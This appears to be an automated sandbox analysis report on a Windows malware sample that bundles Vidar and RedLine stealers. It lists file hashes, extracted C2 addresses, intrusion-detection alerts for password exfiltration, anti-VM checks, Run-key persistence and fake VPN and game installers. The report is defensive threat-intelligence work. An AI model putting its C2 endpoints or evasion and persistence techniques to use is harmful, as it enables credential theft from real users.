Overview
overview
10Static
static
10Mr4X5srRQR...AN.exe
windows10_x64
10OEmxRS9Uai...jI.exe
windows10_x64
10OvVYhhgvd6...oB.exe
windows10_x64
9QKvpJeDIaP...YY.exe
windows10_x64
9QwnNK2SHck...xe.xml
windows10_x64
1QxZsdXOO8X...jN.exe
windows10_x64
10QzUu4XgUxQ...C3.exe
windows10_x64
10SHSPDO6BYD...j9.exe
windows10_x64
10SqCuVl85T1...Di.exe
windows10_x64
10T8Ulrjj8F6..._x.exe
windows10_x64
10Trj0QcTNVE...S9.exe
windows10_x64
10Uwc7l02Hzj...tU.exe
windows10_x64
6VoTrXaqIJ3...LW.exe
windows10_x64
10Wp77te7Dqj...Hr.exe
windows10_x64
9XOCYAkm_Nn...Q3.exe
windows10_x64
9Xd_XnNqsZT...Ai.exe
windows10_x64
10Xr9ca9oQNQ...Z9.exe
windows10_x64
9XukfUfK8HA...FI.exe
windows10_x64
8YPTXDeqMC1...ns.exe
windows10_x64
8ma_5nZD3yo...xT.exe
windows10_x64
10pnDF_dk604...fi.exe
windows10_x64
10q_TzaanAkp...91.exe
windows10_x64
9rgVakr0Eru...xw.exe
windows10_x64
10t1fkwFYUEZ...r4.exe
windows10_x64
10tC6gdsFTgl...3x.exe
windows10_x64
10tGeiUalbSc...xe.xml
windows10_x64
1uMWmES83od...kJ.exe
windows10_x64
10v5n1HuUxta...Iu.exe
windows10_x64
10wTzxLyAQL7...bA.exe
windows10_x64
6xiGD01oEkh...VJ.exe
windows10_x64
10yBqNUgvOW6...Fb.exe
windows10_x64
10Analysis
-
max time kernel
133s -
max time network
318s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
23-08-2021 20:55
Behavioral task
behavioral1
Sample
Mr4X5srRQR20TfuVZShfsrAN.exe
Resource
win10v20210410
Behavioral task
behavioral2
Sample
OEmxRS9UaiMPqIKXPz6Ef8jI.exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
OvVYhhgvd6ZhUony5cRMqVoB.exe
Resource
win10v20210410
Behavioral task
behavioral4
Sample
QKvpJeDIaPtXDcwKwH_WmAYY.exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
QwnNK2SHckcc_GsoTwi8hDi5.exe.xml
Resource
win10v20210410
Behavioral task
behavioral6
Sample
QxZsdXOO8Xn2bW7iW8ff3gjN.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
QzUu4XgUxQuvhFNx7Nf5D6C3.exe
Resource
win10v20210410
Behavioral task
behavioral8
Sample
SHSPDO6BYDV7xlwsZDJxsLj9.exe
Resource
win10v20210410
Behavioral task
behavioral9
Sample
SqCuVl85T1P8OuH3gpVMKnDi.exe
Resource
win10v20210410
Behavioral task
behavioral10
Sample
T8Ulrjj8F65YXJ2qZEm11v_x.exe
Resource
win10v20210408
Behavioral task
behavioral11
Sample
Trj0QcTNVE3l8SBp_3LNLFS9.exe
Resource
win10v20210408
Behavioral task
behavioral12
Sample
Uwc7l02HzjEVLDdBFF3ZKItU.exe
Resource
win10v20210408
Behavioral task
behavioral13
Sample
VoTrXaqIJ3vc2GnUIU6Wi5LW.exe
Resource
win10v20210408
Behavioral task
behavioral14
Sample
Wp77te7DqjxTjTIGMDSB0RHr.exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
XOCYAkm_NnnfPmgVDNgu9MQ3.exe
Resource
win10v20210410
Behavioral task
behavioral16
Sample
Xd_XnNqsZTJJf8dCq4s_mlAi.exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
Xr9ca9oQNQWbUwEgChRmX6Z9.exe
Resource
win10v20210408
Behavioral task
behavioral18
Sample
XukfUfK8HAbjc5wMknHwOhFI.exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
YPTXDeqMC118ip3zHbyxwlns.exe
Resource
win10v20210410
Behavioral task
behavioral20
Sample
ma_5nZD3yos0uV8jzHnJSVxT.exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
pnDF_dk604_fxVsUaLPL1Vfi.exe
Resource
win10v20210410
Behavioral task
behavioral22
Sample
q_TzaanAkp60Doa2Vt025l91.exe
Resource
win10v20210410
Behavioral task
behavioral23
Sample
rgVakr0EruC2FtauFmrgXkxw.exe
Resource
win10v20210408
Behavioral task
behavioral24
Sample
t1fkwFYUEZVXvf_7oFFpVnr4.exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
tC6gdsFTgl9CBMrK_2QhZX3x.exe
Resource
win10v20210410
Behavioral task
behavioral26
Sample
tGeiUalbScQ8sPK2KKmKZNga.exe.xml
Resource
win10v20210410
Behavioral task
behavioral27
Sample
uMWmES83oduRUCtOU5jzfQkJ.exe
Resource
win10v20210410
Behavioral task
behavioral28
Sample
v5n1HuUxtaYNHT7sRlXCCwIu.exe
Resource
win10v20210408
Behavioral task
behavioral29
Sample
wTzxLyAQL7H5FI0GIaor5FbA.exe
Resource
win10v20210410
Behavioral task
behavioral30
Sample
xiGD01oEkhh5s50F0Mw8lPVJ.exe
Resource
win10v20210410
Behavioral task
behavioral31
Sample
yBqNUgvOW6iDky2dKdBCi5Fb.exe
Resource
win10v20210410
General
-
Target
xiGD01oEkhh5s50F0Mw8lPVJ.exe
-
Size
381KB
-
MD5
58f5dca577a49a38ea439b3dc7b5f8d6
-
SHA1
175dc7a597935b1afeb8705bd3d7a556649b06cf
-
SHA256
857dd46102aea53f0cb7934b96410ebbc3e7988d38dcafdc8c0988f436533b98
-
SHA512
3c75c0cbbbc14bd25b4feb141fd1595ce02469da50432fb48400eb089d6150fe87831ccc775d921eeec697af7aad33a35fadcfd2ec775aeee1ce34355af7338a
Malware Config
Extracted
vidar
40.1
916
https://eduarroma.tumblr.com/
-
profile_id
916
Extracted
redline
allsup
188.124.36.242:25802
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4428 3584 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral30/memory/4376-317-0x0000000003240000-0x0000000003272000-memory.dmp family_redline behavioral30/memory/4584-319-0x0000000005500000-0x0000000005534000-memory.dmp family_redline behavioral30/memory/5992-423-0x000000000041A616-mapping.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe family_socelars C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 4748 created 2576 4748 WerFault.exe runvd.exe PID 1780 created 5496 1780 WerFault.exe UanHfLTYCfJh6FZOc3I3aPBg.exe -
suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral30/memory/2576-245-0x0000000004080000-0x000000000411D000-memory.dmp family_vidar behavioral30/memory/2576-257-0x0000000000400000-0x00000000023FF000-memory.dmp family_vidar -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
xiGD01oEkhh5s50F0Mw8lPVJ.tmpSetup.exeStats.exerunvd.exeInlog.exeCleaner Installation.exeStats.tmpWEATHER Manager.exeVPN.exeaskinstall53.exeInlog.tmpMediaBurner2.exePBrowFile15.exeWEATHER Manager.tmpzhaoy-game.exeVPN.tmpLivelyScreenRecS1.9.exextect12.exeMediaBurner2.tmpzhaoy-game.exe7015641.exe2304792.exe5567526.exe5707305.exe4285606.exetmp5C5E_tmp.exeSetup.exebuilder.exeWinHoster.exeSetup.exeSetup.tmp81YOA98fWeBFjZfCfPZnz1R9.exeCxrdbnsYmJXIYC8ZCq3_eatq.exeUOOu7lNtPV4PNh_B7bK8DVoZ.exeO5_mwR6IuhYz_5jqbMnXOb4H.exeConhost.exeYw8U_JxIWkXmT2vRB5edDPOf.exeMuwqvsPFX96gdgOc_2BXvamW.exe3dStGRB5_5z5kl0pdXNKw8KC.exepAnyK8gwLEtBFe86bDDQpgWE.exexjs3mw1bN8Hgit2d0KxOTvr8.exev4BoW79EXHq0JCHzEMLzlDOC.exeKTcFnZEIePx9_JDVNUluPqJ3.exeUanHfLTYCfJh6FZOc3I3aPBg.exeZ7EzvH0MgGMru2S6_QCveS09.exeGtXuVpkHD1RR6DJ5OoRVbYiq.exe_bTcJNEFfnFAvmOWimWnKgBz.exeOBmVLVdD1gQBv_4OOmsJxLm5.exepcuoyDEm3RIoM0KqDfObZcmK.exeOxkkM5SDGnR9IuyLRKAbWS5J.exe81YOA98fWeBFjZfCfPZnz1R9.exedfTk1nJnIzatgWXDRYGmUx0a.exeo5Z0vVBgPoS6Nljy8ZhAYeqf.exeS_Rhe1EMDrJRYwnYQ25ngnzV.exedvTLQXItS4WQaW5zmJh6PYWK.exepAnyK8gwLEtBFe86bDDQpgWE.exeSRk7lU6F4XwYIqXEt2lklni8.exejG875JdywPh3NzDWK2TUJ_gd.exeSetup.exeSetup.tmpcustomer3.exemd8_8eus.exejooyu.exe_bTcJNEFfnFAvmOWimWnKgBz.exepid process 1568 xiGD01oEkhh5s50F0Mw8lPVJ.tmp 3580 Setup.exe 3180 Stats.exe 2576 runvd.exe 2320 Inlog.exe 1756 Cleaner Installation.exe 3844 Stats.tmp 3872 WEATHER Manager.exe 1496 VPN.exe 1280 askinstall53.exe 1068 Inlog.tmp 3356 MediaBurner2.exe 1968 PBrowFile15.exe 2812 WEATHER Manager.tmp 1556 zhaoy-game.exe 4172 VPN.tmp 4148 LivelyScreenRecS1.9.exe 4224 xtect12.exe 4308 MediaBurner2.tmp 4792 zhaoy-game.exe 4216 7015641.exe 2136 2304792.exe 4376 5567526.exe 4584 5707305.exe 4652 4285606.exe 4420 tmp5C5E_tmp.exe 4140 Setup.exe 4260 builder.exe 5012 WinHoster.exe 4796 Setup.exe 2220 Setup.tmp 4808 81YOA98fWeBFjZfCfPZnz1R9.exe 5032 CxrdbnsYmJXIYC8ZCq3_eatq.exe 4772 UOOu7lNtPV4PNh_B7bK8DVoZ.exe 4360 O5_mwR6IuhYz_5jqbMnXOb4H.exe 4892 Conhost.exe 4640 Yw8U_JxIWkXmT2vRB5edDPOf.exe 4060 MuwqvsPFX96gdgOc_2BXvamW.exe 5208 3dStGRB5_5z5kl0pdXNKw8KC.exe 5292 pAnyK8gwLEtBFe86bDDQpgWE.exe 5304 xjs3mw1bN8Hgit2d0KxOTvr8.exe 5468 v4BoW79EXHq0JCHzEMLzlDOC.exe 5484 KTcFnZEIePx9_JDVNUluPqJ3.exe 5496 UanHfLTYCfJh6FZOc3I3aPBg.exe 5552 Z7EzvH0MgGMru2S6_QCveS09.exe 5796 GtXuVpkHD1RR6DJ5OoRVbYiq.exe 5824 _bTcJNEFfnFAvmOWimWnKgBz.exe 5260 OBmVLVdD1gQBv_4OOmsJxLm5.exe 3924 pcuoyDEm3RIoM0KqDfObZcmK.exe 1456 OxkkM5SDGnR9IuyLRKAbWS5J.exe 5992 81YOA98fWeBFjZfCfPZnz1R9.exe 3964 dfTk1nJnIzatgWXDRYGmUx0a.exe 5312 o5Z0vVBgPoS6Nljy8ZhAYeqf.exe 5424 S_Rhe1EMDrJRYwnYQ25ngnzV.exe 4308 dvTLQXItS4WQaW5zmJh6PYWK.exe 4788 pAnyK8gwLEtBFe86bDDQpgWE.exe 4132 SRk7lU6F4XwYIqXEt2lklni8.exe 1512 jG875JdywPh3NzDWK2TUJ_gd.exe 5412 Setup.exe 6180 Setup.tmp 6388 customer3.exe 6396 md8_8eus.exe 6404 jooyu.exe 6456 _bTcJNEFfnFAvmOWimWnKgBz.exe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
OBmVLVdD1gQBv_4OOmsJxLm5.exejG875JdywPh3NzDWK2TUJ_gd.exeZ7EzvH0MgGMru2S6_QCveS09.exeOxkkM5SDGnR9IuyLRKAbWS5J.exexjs3mw1bN8Hgit2d0KxOTvr8.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OBmVLVdD1gQBv_4OOmsJxLm5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion jG875JdywPh3NzDWK2TUJ_gd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion jG875JdywPh3NzDWK2TUJ_gd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Z7EzvH0MgGMru2S6_QCveS09.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OBmVLVdD1gQBv_4OOmsJxLm5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Z7EzvH0MgGMru2S6_QCveS09.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OxkkM5SDGnR9IuyLRKAbWS5J.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OxkkM5SDGnR9IuyLRKAbWS5J.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion xjs3mw1bN8Hgit2d0KxOTvr8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion xjs3mw1bN8Hgit2d0KxOTvr8.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
xtect12.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation xtect12.exe -
Loads dropped DLL 33 IoCs
Processes:
xiGD01oEkhh5s50F0Mw8lPVJ.tmpCleaner Installation.exeStats.tmpInlog.tmpWEATHER Manager.tmpVPN.tmpdvTLQXItS4WQaW5zmJh6PYWK.exerundll32.exeSetup.exeSetup.tmpMsiExec.exeMsiExec.exeCxrdbnsYmJXIYC8ZCq3_eatq.exeSetup.tmpgNuOqGKy1Yc8ILnt_07caihE.tmppid process 1568 xiGD01oEkhh5s50F0Mw8lPVJ.tmp 1568 xiGD01oEkhh5s50F0Mw8lPVJ.tmp 1756 Cleaner Installation.exe 3844 Stats.tmp 3844 Stats.tmp 1068 Inlog.tmp 1068 Inlog.tmp 2812 WEATHER Manager.tmp 2812 WEATHER Manager.tmp 4172 VPN.tmp 4172 VPN.tmp 4308 dvTLQXItS4WQaW5zmJh6PYWK.exe 4188 rundll32.exe 4140 Setup.exe 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 2220 Setup.tmp 6124 MsiExec.exe 2404 MsiExec.exe 6124 MsiExec.exe 5032 CxrdbnsYmJXIYC8ZCq3_eatq.exe 2404 MsiExec.exe 2404 MsiExec.exe 6180 Setup.tmp 5032 CxrdbnsYmJXIYC8ZCq3_eatq.exe 5032 CxrdbnsYmJXIYC8ZCq3_eatq.exe 6592 gNuOqGKy1Yc8ILnt_07caihE.tmp 6592 gNuOqGKy1Yc8ILnt_07caihE.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
2304792.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 2304792.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Z7EzvH0MgGMru2S6_QCveS09.exeOBmVLVdD1gQBv_4OOmsJxLm5.exeOxkkM5SDGnR9IuyLRKAbWS5J.exejG875JdywPh3NzDWK2TUJ_gd.exexjs3mw1bN8Hgit2d0KxOTvr8.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Z7EzvH0MgGMru2S6_QCveS09.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA OBmVLVdD1gQBv_4OOmsJxLm5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA OxkkM5SDGnR9IuyLRKAbWS5J.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jG875JdywPh3NzDWK2TUJ_gd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA xjs3mw1bN8Hgit2d0KxOTvr8.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exeSetup.exeCleaner Installation.exedescription ioc process File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: Setup.exe File opened (read-only) \??\U: Setup.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: Cleaner Installation.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\I: Cleaner Installation.exe File opened (read-only) \??\P: Cleaner Installation.exe File opened (read-only) \??\J: Setup.exe File opened (read-only) \??\Z: Setup.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\O: Setup.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: Cleaner Installation.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\R: Cleaner Installation.exe File opened (read-only) \??\U: Cleaner Installation.exe File opened (read-only) \??\W: Cleaner Installation.exe File opened (read-only) \??\X: Cleaner Installation.exe File opened (read-only) \??\L: Setup.exe File opened (read-only) \??\Y: Setup.exe File opened (read-only) \??\B: Cleaner Installation.exe File opened (read-only) \??\V: Cleaner Installation.exe File opened (read-only) \??\B: Setup.exe File opened (read-only) \??\E: Setup.exe File opened (read-only) \??\T: Setup.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\F: Cleaner Installation.exe File opened (read-only) \??\Q: Cleaner Installation.exe File opened (read-only) \??\Z: Cleaner Installation.exe File opened (read-only) \??\F: Setup.exe File opened (read-only) \??\G: Setup.exe File opened (read-only) \??\V: Setup.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: Cleaner Installation.exe File opened (read-only) \??\K: Cleaner Installation.exe File opened (read-only) \??\M: Cleaner Installation.exe File opened (read-only) \??\S: Cleaner Installation.exe File opened (read-only) \??\T: Cleaner Installation.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\A: Setup.exe File opened (read-only) \??\H: Setup.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\H: Cleaner Installation.exe File opened (read-only) \??\Y: Cleaner Installation.exe File opened (read-only) \??\M: Setup.exe File opened (read-only) \??\N: Setup.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\K: Setup.exe File opened (read-only) \??\Q: Setup.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: Setup.exe File opened (read-only) \??\R: Setup.exe File opened (read-only) \??\S: Setup.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ipinfo.io 56 ipinfo.io 57 ipinfo.io 84 ipinfo.io 285 ipinfo.io 19 ipinfo.io 52 ipinfo.io 243 ipinfo.io 252 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
Processes:
builder.exexjs3mw1bN8Hgit2d0KxOTvr8.exeZ7EzvH0MgGMru2S6_QCveS09.exeOBmVLVdD1gQBv_4OOmsJxLm5.exeOxkkM5SDGnR9IuyLRKAbWS5J.exejG875JdywPh3NzDWK2TUJ_gd.exepid process 4260 builder.exe 4260 builder.exe 5304 xjs3mw1bN8Hgit2d0KxOTvr8.exe 5552 Z7EzvH0MgGMru2S6_QCveS09.exe 5260 OBmVLVdD1gQBv_4OOmsJxLm5.exe 4260 builder.exe 1456 OxkkM5SDGnR9IuyLRKAbWS5J.exe 1512 jG875JdywPh3NzDWK2TUJ_gd.exe 4260 builder.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
81YOA98fWeBFjZfCfPZnz1R9.exepAnyK8gwLEtBFe86bDDQpgWE.exedescription pid process target process PID 4808 set thread context of 5992 4808 81YOA98fWeBFjZfCfPZnz1R9.exe 81YOA98fWeBFjZfCfPZnz1R9.exe PID 5292 set thread context of 4788 5292 pAnyK8gwLEtBFe86bDDQpgWE.exe pAnyK8gwLEtBFe86bDDQpgWE.exe -
Drops file in Program Files directory 64 IoCs
Processes:
Setup.tmpdvTLQXItS4WQaW5zmJh6PYWK.exeSetup.tmpSetup.exedescription ioc process File created C:\Program Files (x86)\MaskVPN\is-MMCPV.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-UIA2R.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-VM6GB.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe dvTLQXItS4WQaW5zmJh6PYWK.exe File created C:\Program Files (x86)\MaskVPN\is-1UK16.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-BJO7K.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-IU8TS.tmp Setup.tmp File created C:\Program Files (x86)\INL Corpo Brovse\is-12PSB.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\is-51924.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-JCOK5.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-CVKSM.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-VGNKC.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\ssleay32.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-ULKJJ.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-7G1Q1.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-9KET8.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-684SD.tmp Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe dvTLQXItS4WQaW5zmJh6PYWK.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe Setup.exe File created C:\Program Files (x86)\INL Corpo Brovse\is-T42IV.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-SCCPA.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-B4BSN.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-SOA61.tmp Setup.tmp File opened for modification C:\Program Files (x86)\INL Corpo Brovse\javaw.exe Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\is-60161.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-696FG.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\unins000.dat Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-SHH94.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-L3NBE.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-Q5BJ8.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-GN3CT.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-K89U6.tmp Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe dvTLQXItS4WQaW5zmJh6PYWK.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini dvTLQXItS4WQaW5zmJh6PYWK.exe File created C:\Program Files (x86)\INL Corpo Brovse\unins000.dat Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-RVKH4.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe Setup.exe File created C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-7RAJ7.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-LNCHM.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-NEPD6.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-2PB5K.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-I00IJ.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-7R5RB.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-MLMJS.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-K5TN6.tmp Setup.tmp File opened for modification C:\Program Files (x86)\INL Corpo Brovse\QtProfiler.exe Setup.tmp -
Drops file in Windows directory 4 IoCs
Processes:
msiexec.exeexpand.exedescription ioc process File created C:\Windows\Installer\f761b64.msi msiexec.exe File opened for modification C:\Windows\Installer\f761b64.msi msiexec.exe File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 384 4188 WerFault.exe rundll32.exe 900 4640 WerFault.exe Yw8U_JxIWkXmT2vRB5edDPOf.exe 1780 5496 WerFault.exe UanHfLTYCfJh6FZOc3I3aPBg.exe 5664 4640 WerFault.exe Yw8U_JxIWkXmT2vRB5edDPOf.exe 4748 2576 WerFault.exe runvd.exe 4068 4640 WerFault.exe Yw8U_JxIWkXmT2vRB5edDPOf.exe 4292 4132 WerFault.exe SRk7lU6F4XwYIqXEt2lklni8.exe 6288 4132 WerFault.exe SRk7lU6F4XwYIqXEt2lklni8.exe 6780 4132 WerFault.exe SRk7lU6F4XwYIqXEt2lklni8.exe 6904 4772 WerFault.exe UOOu7lNtPV4PNh_B7bK8DVoZ.exe -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
